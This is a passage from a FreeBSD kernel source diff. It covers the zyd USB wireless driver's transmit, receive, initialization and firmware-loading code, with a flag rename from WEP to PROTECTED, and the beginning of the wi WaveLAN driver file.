*/ if (zyd_read32(sc, ZYD_EEPROM_PHY_REG, &tmp) == 0) zyd_write16_m(sc, ZYD_CR47, tmp & 0xff); } if (sc->sc_bandedge6 && rf->bandedge6 != NULL) { error = (*rf->bandedge6)(rf, c); if (error != 0) goto fail; } zyd_write32_m(sc, ZYD_CR_CONFIG_PHILIPS, 0); error = zyd_unlock_phy(sc); if (error != 0) goto fail; sc->sc_rxtap.wr_chan_freq = sc->sc_txtap.wt_chan_freq = htole16(c->ic_freq); sc->sc_rxtap.wr_chan_flags = sc->sc_txtap.wt_chan_flags = htole16(c->ic_flags); fail: return; } static int zyd_set_beacon_interval(struct zyd_softc *sc, int bintval) { int error; uint32_t val; zyd_read32_m(sc, ZYD_CR_ATIM_WND_PERIOD, &val); sc->sc_atim_wnd = val; zyd_read32_m(sc, ZYD_CR_PRE_TBTT, &val); sc->sc_pre_tbtt = val; sc->sc_bcn_int = bintval; if (sc->sc_bcn_int <= 5) sc->sc_bcn_int = 5; if (sc->sc_pre_tbtt < 4 || sc->sc_pre_tbtt >= sc->sc_bcn_int) sc->sc_pre_tbtt = sc->sc_bcn_int - 1; if (sc->sc_atim_wnd >= sc->sc_pre_tbtt) sc->sc_atim_wnd = sc->sc_pre_tbtt - 1; zyd_write32_m(sc, ZYD_CR_ATIM_WND_PERIOD, sc->sc_atim_wnd); zyd_write32_m(sc, ZYD_CR_PRE_TBTT, sc->sc_pre_tbtt); zyd_write32_m(sc, ZYD_CR_BCN_INTERVAL, sc->sc_bcn_int); fail: return (error); } static void zyd_rx_data(struct usb_xfer *xfer, int offset, uint16_t len) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct zyd_plcphdr plcp; struct zyd_rx_stat stat; struct usb_page_cache *pc; struct mbuf *m; int rlen, rssi; if (len < ZYD_MIN_FRAGSZ) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: frame too short (length=%d)\n", device_get_nameunit(sc->sc_dev), len); ifp->if_ierrors++; return; } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, offset, &plcp, sizeof(plcp)); usbd_copy_out(pc, offset + len - sizeof(stat), &stat, sizeof(stat)); if (stat.flags & ZYD_RX_ERROR) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: RX status indicated error (%x)\n", device_get_nameunit(sc->sc_dev), stat.flags); ifp->if_ierrors++; return; } /* compute actual frame length */ rlen = len - sizeof(struct zyd_plcphdr) - sizeof(struct zyd_rx_stat) - IEEE80211_CRC_LEN; /* allocate a mbuf to store the frame */ if (rlen > (int)MCLBYTES) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: frame too long (length=%d)\n", device_get_nameunit(sc->sc_dev), rlen); ifp->if_ierrors++; return; } else if (rlen > (int)MHLEN) m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); else m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: could not allocate rx mbuf\n", device_get_nameunit(sc->sc_dev)); ifp->if_ierrors++; return; } m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = rlen; usbd_copy_out(pc, offset + sizeof(plcp), mtod(m, uint8_t *), rlen); if (ieee80211_radiotap_active(ic)) { struct zyd_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; if (stat.flags & (ZYD_RX_BADCRC16 | ZYD_RX_BADCRC32)) tap->wr_flags |= IEEE80211_RADIOTAP_F_BADFCS; /* XXX toss, no way to express errors */ if (stat.flags & ZYD_RX_DECRYPTERR) tap->wr_flags |= IEEE80211_RADIOTAP_F_BADFCS; tap->wr_rate = ieee80211_plcp2rate(plcp.signal, (stat.flags & ZYD_RX_OFDM) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antsignal = stat.rssi + -95; tap->wr_antnoise = -95; /* XXX */ } rssi = (stat.rssi > 63) ? 127 : 2 * stat.rssi; sc->sc_rx_data[sc->sc_rx_count].rssi = rssi; sc->sc_rx_data[sc->sc_rx_count].m = m; sc->sc_rx_count++; } static void zyd_bulk_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni; struct zyd_rx_desc desc; struct mbuf *m; struct usb_page_cache *pc; uint32_t offset; uint8_t rssi; int8_t nf; int i; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); sc->sc_rx_count = 0; switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, actlen - sizeof(desc), &desc, sizeof(desc)); offset = 0; if (UGETW(desc.tag) == ZYD_TAG_MULTIFRAME) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: received multi-frame transfer\n", __func__); for (i = 0; i < ZYD_MAX_RXFRAMECNT; i++) { uint16_t len16 = UGETW(desc.len[i]); if (len16 == 0 || len16 > actlen) break; zyd_rx_data(xfer, offset, len16); /* next frame is aligned on a 32-bit boundary */ len16 = (len16 + 3) & ~3; offset += len16; if (len16 > actlen) break; actlen -= len16; } } else { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: received single-frame transfer\n", __func__); zyd_rx_data(xfer, 0, actlen); } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * At the end of a USB callback it is always safe to unlock * the private mutex of a device! That is why we do the * "ieee80211_input" here, and not some lines up! */ ZYD_UNLOCK(sc); for (i = 0; i < sc->sc_rx_count; i++) { rssi = sc->sc_rx_data[i].rssi; m = sc->sc_rx_data[i].m; sc->sc_rx_data[i].m = NULL; nf = -95; /* XXX */ ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi, nf); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) zyd_start(ifp); ZYD_LOCK(sc); break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_ANY, "frame error: %s\n", usbd_errstr(error)); if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static uint8_t zyd_plcp_signal(struct zyd_softc *sc, int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return (0xb); case 18: return (0xf); case 24: return (0xa); case 36: return (0xe); case 48: return (0x9); case 72: return (0xd); case 96: return (0x8); case 108: return (0xc); /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return (0x0); case 4: return (0x1); case 11: return (0x2); case 22: return (0x3); } device_printf(sc->sc_dev, "unsupported rate %d\n", rate); return (0x0); } static void zyd_bulk_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap; struct zyd_tx_data *data; struct mbuf *m; struct usb_page_cache *pc; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTF(sc, ZYD_DEBUG_ANY, "transfer complete, %u bytes\n", actlen); /* free resources */ data = usbd_xfer_get_priv(xfer); zyd_tx_free(data, 0); usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->tx_q); if (data) { STAILQ_REMOVE_HEAD(&sc->tx_q, next); m = data->m; if (m->m_pkthdr.len > (int)ZYD_MAX_TXBUFSZ) { DPRINTF(sc, ZYD_DEBUG_ANY, "data overflow, %u bytes\n", m->m_pkthdr.len); m->m_pkthdr.len = ZYD_MAX_TXBUFSZ; } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, &data->desc, ZYD_TX_DESC_SIZE); usbd_m_copy_in(pc, ZYD_TX_DESC_SIZE, m, 0, m->m_pkthdr.len); vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct zyd_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = data->rate; ieee80211_radiotap_tx(vap, m); } usbd_xfer_set_frame_len(xfer, 0, ZYD_TX_DESC_SIZE + m->m_pkthdr.len); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); } ZYD_UNLOCK(sc); zyd_start(ifp); ZYD_LOCK(sc); break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_ANY, "transfer error, %s\n", usbd_errstr(error)); ifp->if_oerrors++; data = usbd_xfer_get_priv(xfer); usbd_xfer_set_priv(xfer, NULL); if (data != NULL) zyd_tx_free(data, error); if (error != USB_ERR_CANCELLED) { if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); /* * Try to clear stall first, also if other * errors occur, hence clearing stall * introduces a 50 ms delay: */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static int zyd_tx_start(struct zyd_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct zyd_tx_desc *desc; struct zyd_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; int rate, totlen; static uint8_t ratediv[] = ZYD_TX_RATEDIV; uint8_t phy; uint16_t pktlen; uint32_t bits; wh = mtod(m0, struct ieee80211_frame *); data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT || (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) { tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; rate = tp->mgmtrate; } else { tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; /* for data frames */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return (ENOBUFS); } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } data->ni = ni; data->m = m0; data->rate = rate; /* fill Tx descriptor */ desc = &data->desc; phy = zyd_plcp_signal(sc, rate); desc->phy = phy; if (ZYD_RATE_IS_OFDM(rate)) { desc->phy |= ZYD_TX_PHY_OFDM; if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) desc->phy |= ZYD_TX_PHY_5GHZ; } else if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->phy |= ZYD_TX_PHY_SHPREAMBLE; totlen = m0->m_pkthdr.len + IEEE80211_CRC_LEN; desc->len = htole16(totlen); desc->flags = ZYD_TX_FLAG_BACKOFF; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* multicast frames are not sent at OFDM rates in 802.11b/g */ if (totlen > vap->iv_rtsthreshold) { desc->flags |= ZYD_TX_FLAG_RTS; } else if (ZYD_RATE_IS_OFDM(rate) && (ic->ic_flags & IEEE80211_F_USEPROT)) { if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) desc->flags |= ZYD_TX_FLAG_CTS_TO_SELF; else if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) desc->flags |= ZYD_TX_FLAG_RTS; } } else desc->flags |= ZYD_TX_FLAG_MULTICAST; if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_PS_POLL)) desc->flags |= ZYD_TX_FLAG_TYPE(ZYD_TX_TYPE_PS_POLL); /* actual transmit length (XXX why +10?) */ pktlen = ZYD_TX_DESC_SIZE + 10; if (sc->sc_macrev == ZYD_ZD1211) pktlen += totlen; desc->pktlen = htole16(pktlen); bits = (rate == 11) ? (totlen * 16) + 10 : ((rate == 22) ? (totlen * 8) + 10 : (totlen * 8)); desc->plcp_length = htole16(bits / ratediv[phy]); desc->plcp_service = 0; if (rate == 22 && (bits % 11) > 0 && (bits % 11) <= 3) desc->plcp_service |= ZYD_PLCP_LENGEXT; desc->nextlen = 0; if (ieee80211_radiotap_active_vap(vap)) { struct zyd_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m0); } DPRINTF(sc, ZYD_DEBUG_XMIT, "%s: sending data frame len=%zu rate=%u\n", device_get_nameunit(sc->sc_dev), (size_t)m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[ZYD_BULK_WR]); return (0); } static void zyd_start(struct ifnet *ifp) { struct zyd_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; ZYD_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->tx_nfree == 0) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (zyd_tx_start(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } } ZYD_UNLOCK(sc); } static int zyd_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct zyd_softc *sc = ifp->if_softc; ZYD_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { ZYD_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } if (sc->tx_nfree == 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; ZYD_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return (ENOBUFS); /* XXX */ } /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. * XXX raw path */ if (zyd_tx_start(sc, m, ni) != 0) { ZYD_UNLOCK(sc); ifp->if_oerrors++; ieee80211_free_node(ni); return (EIO); } ZYD_UNLOCK(sc); return (0); } static int zyd_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct zyd_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; ZYD_LOCK(sc); error = (sc->sc_flags & ZYD_FLAG_DETACHED) ? ENXIO : 0; ZYD_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: ZYD_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { zyd_init_locked(sc); startall = 1; } else zyd_set_multi(sc); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) zyd_stop(sc); } ZYD_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void zyd_init_locked(struct zyd_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct usb_config_descriptor *cd; int error; uint32_t val; ZYD_LOCK_ASSERT(sc, MA_OWNED); if (!(sc->sc_flags & ZYD_FLAG_INITONCE)) { error = zyd_loadfirmware(sc); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware (error=%d)\n", error); goto fail; } /* reset device */ cd = usbd_get_config_descriptor(sc->sc_udev); error = usbd_req_set_config(sc->sc_udev, &sc->sc_mtx, cd->bConfigurationValue); if (error) device_printf(sc->sc_dev, "reset failed, continuing\n"); error = zyd_hw_init(sc); if (error) { device_printf(sc->sc_dev, "hardware initialization failed\n"); goto fail; } device_printf(sc->sc_dev, "HMAC ZD1211%s, FW %02x.%02x, RF %s S%x, PA%x LED %x " "BE%x NP%x Gain%x F%x\n", (sc->sc_macrev == ZYD_ZD1211) ? "": "B", sc->sc_fwrev >> 8, sc->sc_fwrev & 0xff, zyd_rf_name(sc->sc_rfrev), sc->sc_al2230s, sc->sc_parev, sc->sc_ledtype, sc->sc_bandedge6, sc->sc_newphy, sc->sc_cckgain, sc->sc_fix_cr157); /* read regulatory domain (currently unused) */ zyd_read32_m(sc, ZYD_EEPROM_SUBID, &val); sc->sc_regdomain = val >> 16; DPRINTF(sc, ZYD_DEBUG_INIT, "regulatory domain %x\n", sc->sc_regdomain); /* we'll do software WEP decryption for now */ DPRINTF(sc, ZYD_DEBUG_INIT, "%s: setting encryption type\n", __func__); zyd_write32_m(sc, ZYD_MAC_ENCRYPTION_TYPE, ZYD_ENC_SNIFFER); sc->sc_flags |= ZYD_FLAG_INITONCE; } if (ifp->if_drv_flags & IFF_DRV_RUNNING) zyd_stop(sc); DPRINTF(sc, ZYD_DEBUG_INIT, "setting MAC address to %6D\n", IF_LLADDR(ifp), ":"); error = zyd_set_macaddr(sc, IF_LLADDR(ifp)); if (error != 0) return; /* set basic rates */ if (ic->ic_curmode == IEEE80211_MODE_11B) zyd_write32_m(sc, ZYD_MAC_BAS_RATE, 0x0003); else if (ic->ic_curmode == IEEE80211_MODE_11A) zyd_write32_m(sc, ZYD_MAC_BAS_RATE, 0x1500); else /* assumes 802.11b/g */ zyd_write32_m(sc, ZYD_MAC_BAS_RATE, 0xff0f); /* promiscuous mode */ zyd_write32_m(sc, ZYD_MAC_SNIFFER, 0); /* multicast setup */ zyd_set_multi(sc); /* set RX filter */ error = zyd_set_rxfilter(sc); if (error != 0) goto fail; /* switch radio transmitter ON */ error = zyd_switch_radio(sc, 1); if (error != 0) goto fail; /* set default BSS channel */ zyd_set_chan(sc, ic->ic_curchan); /* * Allocate Tx and Rx xfer queues. */ zyd_setup_tx_list(sc); /* enable interrupts */ zyd_write32_m(sc, ZYD_CR_INTERRUPT, ZYD_HWINT_MASK); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; usbd_xfer_set_stall(sc->sc_xfer[ZYD_BULK_WR]); usbd_transfer_start(sc->sc_xfer[ZYD_BULK_RD]); usbd_transfer_start(sc->sc_xfer[ZYD_INTR_RD]); return; fail: zyd_stop(sc); return; } static void zyd_init(void *priv) { struct zyd_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ZYD_LOCK(sc); zyd_init_locked(sc); ZYD_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void zyd_stop(struct zyd_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int error; ZYD_LOCK_ASSERT(sc, MA_OWNED); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* * Drain all the transfers, if not already drained: */ ZYD_UNLOCK(sc); usbd_transfer_drain(sc->sc_xfer[ZYD_BULK_WR]); usbd_transfer_drain(sc->sc_xfer[ZYD_BULK_RD]); ZYD_LOCK(sc); zyd_unsetup_tx_list(sc); /* Stop now if the device was never set up */ if (!(sc->sc_flags & ZYD_FLAG_INITONCE)) return; /* switch radio transmitter OFF */ error = zyd_switch_radio(sc, 0); if (error != 0) goto fail; /* disable Rx */ zyd_write32_m(sc, ZYD_MAC_RXFILTER, 0); /* disable interrupts */ zyd_write32_m(sc, ZYD_CR_INTERRUPT, 0); fail: return; } static int zyd_loadfirmware(struct zyd_softc *sc) { struct usb_device_request req; size_t size; u_char *fw; uint8_t stat; uint16_t addr; if (sc->sc_flags & ZYD_FLAG_FWLOADED) return (0); if (sc->sc_macrev == ZYD_ZD1211) { fw = (u_char *)zd1211_firmware; size = sizeof(zd1211_firmware); } else { fw = (u_char *)zd1211b_firmware; size = sizeof(zd1211b_firmware); } req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = ZYD_DOWNLOADREQ; USETW(req.wIndex, 0); addr = ZYD_FIRMWARE_START_ADDR; while (size > 0) { /* * When the transfer size is 4096 bytes, it is not * likely to be able to transfer it. * The cause is port or machine or chip? */ const int mlen = min(size, 64); DPRINTF(sc, ZYD_DEBUG_FW, "loading firmware block: len=%d, addr=0x%x\n", mlen, addr); USETW(req.wValue, addr); USETW(req.wLength, mlen); if (zyd_do_request(sc, &req, fw) != 0) return (EIO); addr += mlen / 2; fw += mlen; size -= mlen; } /* check whether the upload succeeded */ req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = ZYD_DOWNLOADSTS; USETW(req.wValue, 0); USETW(req.wIndex, 0); USETW(req.wLength, sizeof(stat)); if (zyd_do_request(sc, &req, &stat) != 0) return (EIO); sc->sc_flags |= ZYD_FLAG_FWLOADED; return (stat & 0x80) ? (EIO) : (0); } static void zyd_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct zyd_softc *sc = ifp->if_softc; ZYD_LOCK(sc); /* want broadcast address while scanning */ zyd_set_bssid(sc, ifp->if_broadcastaddr); ZYD_UNLOCK(sc); } static void zyd_scan_end(struct ieee80211com *ic) { struct zyd_softc *sc = ic->ic_ifp->if_softc; ZYD_LOCK(sc); /* restore previous bssid */ zyd_set_bssid(sc, sc->sc_bssid); ZYD_UNLOCK(sc); } static void zyd_set_channel(struct ieee80211com *ic) { struct zyd_softc *sc = ic->ic_ifp->if_softc; ZYD_LOCK(sc); zyd_set_chan(sc, ic->ic_curchan); ZYD_UNLOCK(sc); } static device_method_t zyd_methods[] = { /* Device interface */ DEVMETHOD(device_probe, zyd_match), DEVMETHOD(device_attach, zyd_attach), DEVMETHOD(device_detach, zyd_detach), DEVMETHOD_END }; static driver_t zyd_driver = { .name = "zyd", .methods = zyd_methods, .size = sizeof(struct zyd_softc) }; static devclass_t zyd_devclass; DRIVER_MODULE(zyd, uhub, zyd_driver, zyd_devclass, NULL, 0); MODULE_DEPEND(zyd, usb, 1, 1, 1); MODULE_DEPEND(zyd, wlan, 1, 1, 1); MODULE_VERSION(zyd, 1); diff --git a/sys/dev/wi/if_wi.c b/sys/dev/wi/if_wi.c index ac6d8c09bb92..d713c97eb6a7 100644 --- a/sys/dev/wi/if_wi.c +++ b/sys/dev/wi/if_wi.c @@ -1,2127 +1,2127 @@ /*- * Copyright (c) 1997, 1998, 1999 * Bill Paul . All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL Bill Paul OR THE VOICES IN HIS HEAD * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* * Lucent WaveLAN/IEEE 802.11 PCMCIA driver. * * Original FreeBSD driver written by Bill Paul * Electrical Engineering Department * Columbia University, New York City */ /* * The WaveLAN/IEEE adapter is the second generation of the WaveLAN * from Lucent. Unlike the older cards, the new ones are programmed * entirely via a firmware-driven controller called the Hermes. * Unfortunately, Lucent will not release the Hermes programming manual * without an NDA (if at all). What they do release is an API library * called the HCF (Hardware Control Functions) which is supposed to * do the device-specific operations of a device driver for you. The * publically available version of the HCF library (the 'HCF Light') is * a) extremely gross, b) lacks certain features, particularly support * for 802.11 frames, and c) is contaminated by the GNU Public License. * * This driver does not use the HCF or HCF Light at all. Instead, it * programs the Hermes controller directly, using information gleaned * from the HCF Light code and corresponding documentation. * * This driver supports the ISA, PCMCIA and PCI versions of the Lucent * WaveLan cards (based on the Hermes chipset), as well as the newer * Prism 2 chipsets with firmware from Intersil and Symbol. */ #include __FBSDID("$FreeBSD$"); #include "opt_wlan.h" #define WI_HERMES_STATS_WAR /* Work around stats counter bug. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include static struct ieee80211vap *wi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void wi_vap_delete(struct ieee80211vap *vap); static void wi_stop_locked(struct wi_softc *sc, int disable); static void wi_start_locked(struct ifnet *); static void wi_start(struct ifnet *); static int wi_start_tx(struct ifnet *ifp, struct wi_frame *frmhdr, struct mbuf *m0); static int wi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int wi_newstate_sta(struct ieee80211vap *, enum ieee80211_state, int); static int wi_newstate_hostap(struct ieee80211vap *, enum ieee80211_state, int); static void wi_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m, int subtype, int rssi, int nf); static int wi_reset(struct wi_softc *); static void wi_watchdog(void *); static int wi_ioctl(struct ifnet *, u_long, caddr_t); static void wi_media_status(struct ifnet *, struct ifmediareq *); static void wi_rx_intr(struct wi_softc *); static void wi_tx_intr(struct wi_softc *); static void wi_tx_ex_intr(struct wi_softc *); static void wi_info_intr(struct wi_softc *); static int wi_write_txrate(struct wi_softc *, struct ieee80211vap *); static int wi_write_wep(struct wi_softc *, struct ieee80211vap *); static int wi_write_multi(struct wi_softc *); static void wi_update_mcast(struct ifnet *); static void wi_update_promisc(struct ifnet *); static int wi_alloc_fid(struct wi_softc *, int, int *); static void wi_read_nicid(struct wi_softc *); static int wi_write_ssid(struct wi_softc *, int, u_int8_t *, int); static int wi_cmd(struct wi_softc *, int, int, int, int); static int wi_seek_bap(struct wi_softc *, int, int); static int wi_read_bap(struct wi_softc *, int, int, void *, int); static int wi_write_bap(struct wi_softc *, int, int, void *, int); static int wi_mwrite_bap(struct wi_softc *, int, int, struct mbuf *, int); static int wi_read_rid(struct wi_softc *, int, void *, int *); static int wi_write_rid(struct wi_softc *, int, void *, int); static int wi_write_appie(struct wi_softc *, int, const struct ieee80211_appie *); static void wi_scan_start(struct ieee80211com *); static void wi_scan_end(struct ieee80211com *); static void wi_set_channel(struct ieee80211com *); static __inline int wi_write_val(struct wi_softc *sc, int rid, u_int16_t val) { val = htole16(val); return wi_write_rid(sc, rid, &val, sizeof(val)); } static SYSCTL_NODE(_hw, OID_AUTO, wi, CTLFLAG_RD, 0, "Wireless driver parameters"); static struct timeval lasttxerror; /* time of last tx error msg */ static int curtxeps; /* current tx error msgs/sec */ static int wi_txerate = 0; /* tx error rate: max msgs/sec */ SYSCTL_INT(_hw_wi, OID_AUTO, txerate, CTLFLAG_RW, &wi_txerate, 0, "max tx error msgs/sec; 0 to disable msgs"); #define WI_DEBUG #ifdef WI_DEBUG static int wi_debug = 0; SYSCTL_INT(_hw_wi, OID_AUTO, debug, CTLFLAG_RW, &wi_debug, 0, "control debugging printfs"); #define DPRINTF(X) if (wi_debug) printf X #else #define DPRINTF(X) #endif #define WI_INTRS (WI_EV_RX | WI_EV_ALLOC | WI_EV_INFO) struct wi_card_ident wi_card_ident[] = { /* CARD_ID CARD_NAME FIRM_TYPE */ { WI_NIC_LUCENT_ID, WI_NIC_LUCENT_STR, WI_LUCENT }, { WI_NIC_SONY_ID, WI_NIC_SONY_STR, WI_LUCENT }, { WI_NIC_LUCENT_EMB_ID, WI_NIC_LUCENT_EMB_STR, WI_LUCENT }, { WI_NIC_EVB2_ID, WI_NIC_EVB2_STR, WI_INTERSIL }, { WI_NIC_HWB3763_ID, WI_NIC_HWB3763_STR, WI_INTERSIL }, { WI_NIC_HWB3163_ID, WI_NIC_HWB3163_STR, WI_INTERSIL }, { WI_NIC_HWB3163B_ID, WI_NIC_HWB3163B_STR, WI_INTERSIL }, { WI_NIC_EVB3_ID, WI_NIC_EVB3_STR, WI_INTERSIL }, { WI_NIC_HWB1153_ID, WI_NIC_HWB1153_STR, 